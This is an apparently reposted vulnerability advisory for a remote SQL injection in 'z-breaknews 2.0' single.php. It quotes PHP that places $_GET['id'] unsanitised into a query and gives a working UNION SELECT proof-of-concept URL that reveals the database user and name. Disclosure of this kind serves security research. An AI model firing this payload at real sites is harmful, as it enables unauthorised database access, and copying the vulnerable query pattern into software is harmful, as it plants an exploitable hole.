z&#65279;######################################################################################## # # Name : z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability # Author : cOndemned [ Dark-Coders ] # Greetz : Avantura, str0ke, ZaBeaTy, t0pP8uZz, 0in, suN8Hclf & All of my friends # ######################################################################################## source of single.php : [ ... ] 4. @mysql_select_db("$dbName")or die("&Iacute;&#314; ě&icirc;&#259;ó &acirc;&#369;á&#273;&#341;ňü á&#341;&ccedil;ó &auml;&#341;íí&#369;&#337; "); 5. $row=mysql_fetch_array(mysql_query("SELECT * FROM $table WHERE id=".$_GET['id'])); 6. echo $row['date'] ?></title> [ ... ] 36. $row=mysql_fetch_array(mysql_query("SELECT * FROM $table WHERE id=".$_GET['id'])); [ ... ] 41. <td widht=100% ALIGN=\"left\" valign=\'top'\><h1>$row[date]</h1> [ ... ] proof of concept (admins login & password are not in database, so... ) http://[host]/single.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database()),3,4,5/* ^ This will print requested information between <title> (line 6) and <h1> (line 41) tags just 4 fun
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论